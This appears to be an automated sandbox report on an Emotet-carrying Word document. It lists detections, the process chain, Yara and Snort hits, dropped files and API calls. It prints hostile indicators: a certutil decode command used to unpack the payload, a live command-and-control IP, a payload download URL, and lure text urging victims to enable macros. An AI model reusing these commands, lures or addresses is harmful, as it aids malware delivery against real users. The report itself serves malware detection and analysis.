Loading ...

Play interactive tourEdit tour

Analysis Report sample1.bin

Overview

General Information

Sample Name:sample1.bin (renamed file extension from bin to doc)
Analysis ID:339446
MD5:7dbd8ecfada1d39a81a58c9468b91039
SHA1:0d21e2742204d1f98f6fcabe0544570fd6857dd3
SHA256:dc40e48d2eb0e57cd16b1792bdccc185440f632783c7bcc87c955e1d4e88fc95

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Creates and opens a fake document (probably a fake document to hide exploiting)
Creates processes via WMI
Document contains an embedded VBA macro with suspicious strings
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to delete services
Contains functionality to enumerate running services
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2264 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • certutil.exe (PID: 2440 cmdline: Certutil -decode C:\Users\Public\Ksh1.xls C:\Users\Public\Ksh1.pdf MD5: 4586B77B18FA9A8518AF76CA8FD247D9)
  • svchost.exe (PID: 2348 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: C78655BC80301D76ED4FEF1C1EA40A7D)
  • tmp_e473b4.exe (PID: 1772 cmdline: C:\Users\user\AppData\Local\Temp/tmp_e473b4.exe MD5: E87553AEBAC0BF74D165A87321C629BE)
    • auditpolmsg.exe (PID: 1688 cmdline: C:\Windows\SysWOW64\srclient\auditpolmsg.exe MD5: E87553AEBAC0BF74D165A87321C629BE)
      • wcnwiz.exe (PID: 2064 cmdline: C:\Windows\SysWOW64\mfc110\wcnwiz.exe MD5: E87553AEBAC0BF74D165A87321C629BE)
        • SampleRes.exe (PID: 2004 cmdline: C:\Windows\SysWOW64\capiprovider\SampleRes.exe MD5: E87553AEBAC0BF74D165A87321C629BE)
          • NlsData0414.exe (PID: 2364 cmdline: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exe MD5: E87553AEBAC0BF74D165A87321C629BE)
            • mfc140.exe (PID: 1664 cmdline: C:\Windows\SysWOW64\KBDNO\mfc140.exe MD5: E87553AEBAC0BF74D165A87321C629BE)
              • ieframe.exe (PID: 1236 cmdline: C:\Windows\SysWOW64\advapi32\ieframe.exe MD5: E87553AEBAC0BF74D165A87321C629BE)
                • cryptdll.exe (PID: 2728 cmdline: C:\Windows\SysWOW64\nshipsec\cryptdll.exe MD5: E87553AEBAC0BF74D165A87321C629BE)
                  • wlanui.exe (PID: 2832 cmdline: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exe MD5: E87553AEBAC0BF74D165A87321C629BE)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2256698017.00000000003F1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000009.00000003.2262096055.0000000000548000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      0000000C.00000002.2279698396.00000000003E1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        0000000A.00000003.2266631097.0000000000578000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000007.00000003.2252976219.0000000000588000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 23 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            12.2.mfc140.exe.3e0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              10.2.SampleRes.exe.7b0000.2.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                13.2.ieframe.exe.320000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  14.2.cryptdll.exe.620000.2.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    15.2.wlanui.exe.480000.2.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 4 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus / Scanner detection for submitted sampleShow sources
                      Source: sample1.docAvira: detected
                      Antivirus detection for dropped fileShow sources
                      Source: C:\Users\Public\Ksh1.pdfAvira: detection malicious, Label: TR/Casdet.xqfgu
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\Public\Ksh1.pdfMetadefender: Detection: 40%Perma Link
                      Source: C:\Users\Public\Ksh1.pdfReversingLabs: Detection: 64%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: sample1.docVirustotal: Detection: 61%Perma Link
                      Source: sample1.docMetadefender: Detection: 45%Perma Link
                      Source: sample1.docReversingLabs: Detection: 72%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\Public\Ksh1.pdfJoe Sandbox ML: detected
                      Machine Learning detection for sampleShow sources
                      Source: sample1.docJoe Sandbox ML: detected
                      Source: 9.1.wcnwiz.exe.39b0000.1.unpackAvira: Label: TR/Dropper.Gen
                      Source: 14.1.cryptdll.exe.3ab0000.1.unpackAvira: Label: TR/Dropper.Gen
                      Source: 7.1.tmp_e473b4.exe.3a20000.2.unpackAvira: Label: TR/Dropper.Gen
                      Source: 13.1.ieframe.exe.39f0000.1.unpackAvira: Label: TR/Dropper.Gen
                      Source: 9.0.wcnwiz.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.fao
                      Source: 7.0.tmp_e473b4.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.fao
                      Source: 10.1.SampleRes.exe.39e0000.1.unpackAvira: Label: TR/Dropper.Gen
                      Source: 15.0.wlanui.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.fao
                      Source: 13.0.ieframe.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.fao
                      Source: 8.0.auditpolmsg.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.fao
                      Source: 7.1.tmp_e473b4.exe.3a20000.1.unpackAvira: Label: TR/Dropper.Gen
                      Source: 14.0.cryptdll.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.fao
                      Source: 12.1.mfc140.exe.3980000.1.unpackAvira: Label: TR/Dropper.Gen
                      Source: 12.0.mfc140.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.fao
                      Source: 8.1.auditpolmsg.exe.39b0000.1.unpackAvira: Label: TR/Dropper.Gen
                      Source: 11.0.NlsData0414.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.fao
                      Source: 10.0.SampleRes.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.fao
                      Source: 11.1.NlsData0414.exe.39c0000.1.unpackAvira: Label: TR/Dropper.Gen
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeCode function: 15_2_004825E0 CryptDecodeObjectEx,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptAcquireContextW,CryptGenKey,CryptCreateHash,GetProcessHeap,HeapFree,15_2_004825E0
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeCode function: 15_2_00482230 CryptEncrypt,memcpy,CryptGetHashParam,CryptDestroyHash,CryptDuplicateHash,CryptExportKey,GetProcessHeap,RtlAllocateHeap,15_2_00482230
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeCode function: 15_2_00481FC0 CryptDestroyHash,CryptDuplicateHash,memcpy,15_2_00481FC0
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeCode function: 15_2_00481FD8 CryptDestroyHash,15_2_00481FD8
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_003F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,7_2_003F38F0
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeCode function: 8_2_003638F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,8_2_003638F0
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeCode function: 9_2_003B38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,9_2_003B38F0
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeCode function: 10_2_007B38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,10_2_007B38F0
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeCode function: 11_2_002B38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,11_2_002B38F0
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeCode function: 12_2_003E38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,12_2_003E38F0
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeCode function: 13_2_003238F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,13_2_003238F0
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeCode function: 14_2_006238F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,14_2_006238F0
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeCode function: 15_2_004838F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,15_2_004838F0
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 4x nop then push ebp7_2_0041FA20
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 177.130.51.198:80

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.2.22:49170 -> 177.130.51.198:80
                      Source: Joe Sandbox ViewIP Address: 177.130.51.198 177.130.51.198
                      Source: Joe Sandbox ViewASN Name: WspServicosdeTelecomunicacoesLtdaBR WspServicosdeTelecomunicacoesLtdaBR
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 177.130.51.198:80
                      Source: unknownTCP traffic detected without corresponding DNS query: 177.130.51.198
                      Source: unknownTCP traffic detected without corresponding DNS query: 177.130.51.198
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B5C9B88B-61BE-41BF-89DB-AF92964D1C77}.tmpJump to behavior
                      Source: certutil.exe, 00000001.00000002.2223417988.00000000022A0000.00000002.00000001.sdmp, tmp_e473b4.exe, 00000007.00000002.2258709906.00000000030D0000.00000002.00000001.sdmp, auditpolmsg.exe, 00000008.00000002.2265231662.0000000002F30000.00000002.00000001.sdmp, wcnwiz.exe, 00000009.00000002.2269936188.0000000003060000.00000002.00000001.sdmp, SampleRes.exe, 0000000A.00000002.2273974582.0000000002F20000.00000002.00000001.sdmp, NlsData0414.exe, 0000000B.00000002.2278988967.0000000003000000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: certutil.exe, 00000001.00000002.2223417988.00000000022A0000.00000002.00000001.sdmp, tmp_e473b4.exe, 00000007.00000002.2258709906.00000000030D0000.00000002.00000001.sdmp, auditpolmsg.exe, 00000008.00000002.2265231662.0000000002F30000.00000002.00000001.sdmp, wcnwiz.exe, 00000009.00000002.2269936188.0000000003060000.00000002.00000001.sdmp, SampleRes.exe, 0000000A.00000002.2273974582.0000000002F20000.00000002.00000001.sdmp, NlsData0414.exe, 0000000B.00000002.2278988967.0000000003000000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: certutil.exe, 00000001.00000002.2223923762.0000000002770000.00000004.00000001.sdmpString found in binary or memory: https://pornthash.mobi/videos/tayna_tung
                      Source: certutil.exe, 00000001.00000002.2223923762.0000000002770000.00000004.00000001.sdmpString found in binary or memory: https://pornthash.mobi/videos/tayna_tung%temp%/tmp_e473b4.exex

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000007.00000002.2256698017.00000000003F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.2262096055.0000000000548000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2279698396.00000000003E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.2266631097.0000000000578000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.2252976219.0000000000588000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2292365132.00000000008C4000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.2286180989.0000000000908000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.2257551859.00000000005F8000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2276010487.00000000005F8000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2335114479.00000000002B4000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2256830860.0000000000586000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2275531038.00000000002B1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2335374791.0000000000481000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2285331820.00000000008E4000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000003.2280766001.0000000000928000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2265953499.0000000000546000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2271093826.0000000000576000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2285132994.0000000000321000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2263042599.00000000005F6000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2271279815.00000000007B1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2292162710.0000000000621000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2276502729.00000000005E6000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000003.2271289978.00000000005E8000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2265821061.00000000003B1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2280282398.00000000005F6000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2262078055.0000000000361000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.2292126114.00000000002F8000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 12.2.mfc140.exe.3e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.SampleRes.exe.7b0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.ieframe.exe.320000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cryptdll.exe.620000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.wlanui.exe.480000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.tmp_e473b4.exe.3f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.NlsData0414.exe.2b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.wcnwiz.exe.3b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.auditpolmsg.exe.360000.1.unpack, type: UNPACKEDPE
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeCode function: 15_2_004825E0 CryptDecodeObjectEx,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptAcquireContextW,CryptGenKey,CryptCreateHash,GetProcessHeap,HeapFree,15_2_004825E0

                      System Summary:

                      barindex
                      Malicious sample detected (through community Yara rule)Show sources
                      Source: 00000005.00000002.2252845078.00000000002FD000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: Enable editing" from the yellow bar above. QNN q 2 Once you have enabled editing, please click
                      Source: Screenshot number: 4Screenshot OCR: Enable content" on the yellow bar above. Em> "this document is completely safety to open Page: 1 o
                      Source: Document image extraction number: 0Screenshot OCR: Enable editing' from the yellow bar 2 Once you have enabled editing, please click "Enable content'
                      Source: Document image extraction number: 0Screenshot OCR: Enable content' on the yellow bar above. *this document is completely safety to open
                      Document contains an embedded VBA macro with suspicious stringsShow sources
                      Source: sample1.docOLE, VBA macro line: Private Declare PtrSafe Function Sleep Lib "Kernel32" (ByVal One As Long) As Long
                      Source: sample1.docOLE, VBA macro line: Private Declare Function Sleep Lib "Kernel32" (ByVal One As Long) As Long
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_003E0400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,7_2_003E0400
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeCode function: 8_2_002D0400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,8_2_002D0400
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeCode function: 9_2_003A0400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,9_2_003A0400
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeCode function: 10_2_007A0400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,10_2_007A0400
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeCode function: 11_2_002A0400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,11_2_002A0400
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeCode function: 12_2_002D0400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,12_2_002D0400
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeCode function: 13_2_00310400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,13_2_00310400
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeCode function: 14_2_00610400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,14_2_00610400
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeCode function: 15_2_00460400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,15_2_00460400
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeCode function: 8_2_00368E80 CloseServiceHandle,OpenSCManagerW,DeleteService,OpenServiceW,OpenServiceW,CloseServiceHandle,8_2_00368E80
                      Source: C:\Windows\System32\certutil.exeFile created: C:\Windows\cerED0D.tmpJump to behavior
                      Source: C:\Windows\System32\certutil.exeFile deleted: C:\Windows\cerED0D.tmpJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_0040314D7_2_0040314D
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_004052D47_2_004052D4
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_004093507_2_00409350
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_00406DA87_2_00406DA8
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_003F78B07_2_003F78B0
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_003F1C707_2_003F1C70
                      Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exeCode function: 7_2_003F65E07_2_003F65E0
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeCode function: 8_2_00361C708_2_00361C70
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeCode function: 8_2_003678B08_2_003678B0
                      Source: C:\Windows\SysWOW64\srclient\auditpolmsg.exeCode function: 8_2_003665E08_2_003665E0
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeCode function: 9_2_003B1C709_2_003B1C70
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeCode function: 9_2_003B78B09_2_003B78B0
                      Source: C:\Windows\SysWOW64\mfc110\wcnwiz.exeCode function: 9_2_003B65E09_2_003B65E0
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeCode function: 10_2_007B1C7010_2_007B1C70
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeCode function: 10_2_007B65E010_2_007B65E0
                      Source: C:\Windows\SysWOW64\capiprovider\SampleRes.exeCode function: 10_2_007B78B010_2_007B78B0
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeCode function: 11_2_002B1C7011_2_002B1C70
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeCode function: 11_2_002B78B011_2_002B78B0
                      Source: C:\Windows\SysWOW64\RMActivate_ssp_isv\NlsData0414.exeCode function: 11_2_002B65E011_2_002B65E0
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeCode function: 12_2_003E1C7012_2_003E1C70
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeCode function: 12_2_003E78B012_2_003E78B0
                      Source: C:\Windows\SysWOW64\KBDNO\mfc140.exeCode function: 12_2_003E65E012_2_003E65E0
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeCode function: 13_2_00321C7013_2_00321C70
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeCode function: 13_2_003278B013_2_003278B0
                      Source: C:\Windows\SysWOW64\advapi32\ieframe.exeCode function: 13_2_003265E013_2_003265E0
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeCode function: 14_2_00621C7014_2_00621C70
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeCode function: 14_2_006265E014_2_006265E0
                      Source: C:\Windows\SysWOW64\nshipsec\cryptdll.exeCode function: 14_2_006278B014_2_006278B0
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeCode function: 15_2_00481C7015_2_00481C70
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeCode function: 15_2_004865E015_2_004865E0
                      Source: C:\Windows\SysWOW64\DShowRdpFilter\wlanui.exeCode function: 15_2_004878B015_2_004878B0
                      Source: sample1.docOLE, VBA macro line: Private Sub Document_Close()
                      Source: sample1.docOLE, VBA macro line: Form_Close
                      Source: sample1.docOLE, VBA macro line: Private Sub Form_Close()
                      Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_CloseName: Document_Close
                      Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Form_CloseName: Form_Close
                      Source: sample1.docOLE indicator, VBA macros: true
                      Source: Joe Sandbox ViewDropped File: C:\Users\Public\Ksh1.pdf FB07F875DC45E6045735513E75A83C50C78154851BD23A645D43EA853E6800AC
